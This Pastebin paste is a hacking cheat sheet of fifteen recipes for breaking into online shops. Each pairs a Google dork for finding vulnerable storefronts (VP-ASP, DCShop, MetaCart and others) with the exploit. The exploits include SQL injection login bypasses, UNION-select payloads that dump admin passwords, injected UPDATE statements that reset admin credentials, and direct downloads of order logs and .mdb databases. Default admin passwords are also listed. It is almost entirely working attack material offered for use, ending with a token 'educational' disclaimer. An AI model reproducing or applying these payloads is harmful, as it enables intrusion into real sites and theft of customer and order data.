Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Most of these are outdated but they can still work if you happen to find a vulnerable site:
- 1:
- CODE:google dork :--> inurl:"/cart.php?m="
- target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view
- exploit: chage cart.php?m=view to /admin
- target whit exploit :--> http://xxxxxx.com/store/admin
- Usename : 'or"="
- Password : 'or"=
- 2:
- CODE:google dork :--> allinurlroddetail.asp?prod=
- target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
- exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
- target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
- 3:
- CODE:google dork :--> allinurl: /cgi-local/shopper.cgi
- target looks like :--> http://www.xxxxxx.co....dd=action&key=
- exploit :--> ...&template=order.log
- target whit exploit :--> http://www.xxxxxxxx.....late=order.log
- 4:
- CODE:google dork :--> allinurl: Lobby.asp
- target looks like :--> www.xxxxx.com/mall/lobby.asp
- exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
- target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb
- 5:
- CODE:google dork :--> allinurl:/vpasp/shopsearch.asp
- when u find a target put this in search box
- Keyword=&category=5); insert into tbluser (fldusername) values
- ('')--&SubCategory=&hide=&action.x=46&action.y=6
- Keyword=&category=5); update tbluser set fldpassword='' where
- fldusername=''--&SubCategory=All&action.x=33&action.y=6
- Keyword=&category=3); update tbluser set fldaccess='1' where
- fldusername=''--&SubCategory=All&action.x=33&action.y=6
- Jangan lupa untuk mengganti dan nya terserah kamu.
- Untuk mengganti password admin, masukkan keyword berikut :
- Keyword=&category=5); update tbluser set fldpassword='' where
- fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
- login page: http://xxxxxxx/vpasp/shopadmin.asp
- 6.
- google dork :--> allinurl:/vpasp/shopdisplayproducts.asp target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'- if this is not working try this ends %20'a%25'-- %20'b%25'-- %20'c%25'-- after finding user and pass go to login page: http://xxxx.com/vpasp/shopadmin.asp
- 7:
- CODE:google dork :--> allinurl:/shopadmin.asp
- target looks like :--> www.xxxxxx.com/shopadmin.asp
- exploit:
- user : 'or'1
- pass : 'or'1
- 8:
- CODE:google.com :--> allinurl:/store/index.cgi/page=
- target looks like :--> http://www.xxxxxx.co....short_blue.htm
- exploit :--> ../admin/files/order.log
- target whit exploit :--> http://www.xxxxxxx.c....iles/order.log
- 9:
- CODE:google.com:--> allinurl:/metacart/
- target looks like :--> www.xxxxxx.com/metacart/about.asp
- exploit :--> /database/metacart.mdb
- target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
- 10:
- CODE:google.com:--> allinurl:/DCShop/
- target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
- exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
- target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
- 11:
- CODE:google.com:--> allinurl:/shop/category.asp/catid=
- target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
- exploit :--> /admin/dbsetup.asp
- target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
- after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
- target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
- in db look for access to find pass and user of shop admins.
- 12:
- CODE:google.com:--> allinurl:/commercesql/
- target looks like :--> www.xxxxx.com/commercesql/xxxxx
- exploit :--> cgi-bin/commercesql/index.cgi?page=
- target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
- target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
- target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log
- 13:
- CODE:google.com:--> allinurl:/eshop/
- target looks like :--> www.xxxxx.com/xxxxx/eshop
- exploit :-->/cg-bin/eshop/database/order.mdb
- target whit exploit :--> http://www.xxxxxx.co....base/order.mdb
- after dl the db look at access for user and password
- 14:
- 1/search google: allinurl:"shopdisplayproducts.asp?id= --->http://victim.com/shopdisplayproducts.asp?id=5 2/find error by adding ' --->http://victim.com/shopdisplayproducts.asp?id=5' --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467 -If you don't see error then change id to cat --->http://victim.com/shopdisplayproducts.asp?cat=5' 3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match...... 4/ add 2,3,4,5,6.......until you see a nice table add 2 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password then 3 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password ...5,6,7,8,9.... untill you see a table. (exp:...47) ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password ---->see a table. 5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password 6/Find link admin to login: try this first: http://victim.com/shopadmin.asp or: http://victim.com/shopadmin.asp Didn't work? then u have to find yourself: add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password you'll see something like: ( lot of them) shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp .............. then guess admin link by adding the above data untill you find admin links
- 15:
- xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:. the most important thing here is xDatabase xDatabase: shopping140 ok now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb if you didn't download the Database.. Try this while there is dblocation. xDblocation resx the url will be: ****://***.victim.com/shop/resx/shopping140.mdb If u see the error message you have to try this : ****://***.victim.com/shop/shopping500.mdb download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com inside you should be able to find *** information. and you should even be able to find the admin username and password for the website. the admin login page is usually located here ****://***.victim.com/shop/shopadmin.asp if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are Username: admin password: admin OR Username: vpasp password: vpasp
- REMEMBER EVERYTHING HERE IS FOR EDUCATIONAL AND RESEARCH PURPOSES!